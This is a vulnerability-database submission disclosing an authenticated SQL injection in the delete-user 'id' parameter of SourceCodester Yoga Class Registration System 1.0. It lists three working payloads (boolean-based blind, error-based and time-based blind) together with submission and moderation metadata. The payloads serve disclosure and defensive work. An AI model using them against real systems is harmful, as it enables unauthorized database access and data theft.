| Title | Authenticated POST based SQL Injection when delete user on Yoga Class Registration System |
|---|
| Description | # Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# Tested on: Windows 11
# Payload
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE (SELECT 8487 UNION SELECT 3172) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=96' AND (SELECT 4409 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT (ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ
``
|
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html |
|---|
| User | mroz1l (UID 41497) |
|---|
| Submission | 02/23/2023 10:38 (3 years ago) |
|---|
| Moderation | 02/23/2023 12:06 (1 hour later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 221676 [SourceCodester Yoga Class Registration System 1.0 Delete User ID sql injection] |
|---|
| Points | 20 |
|---|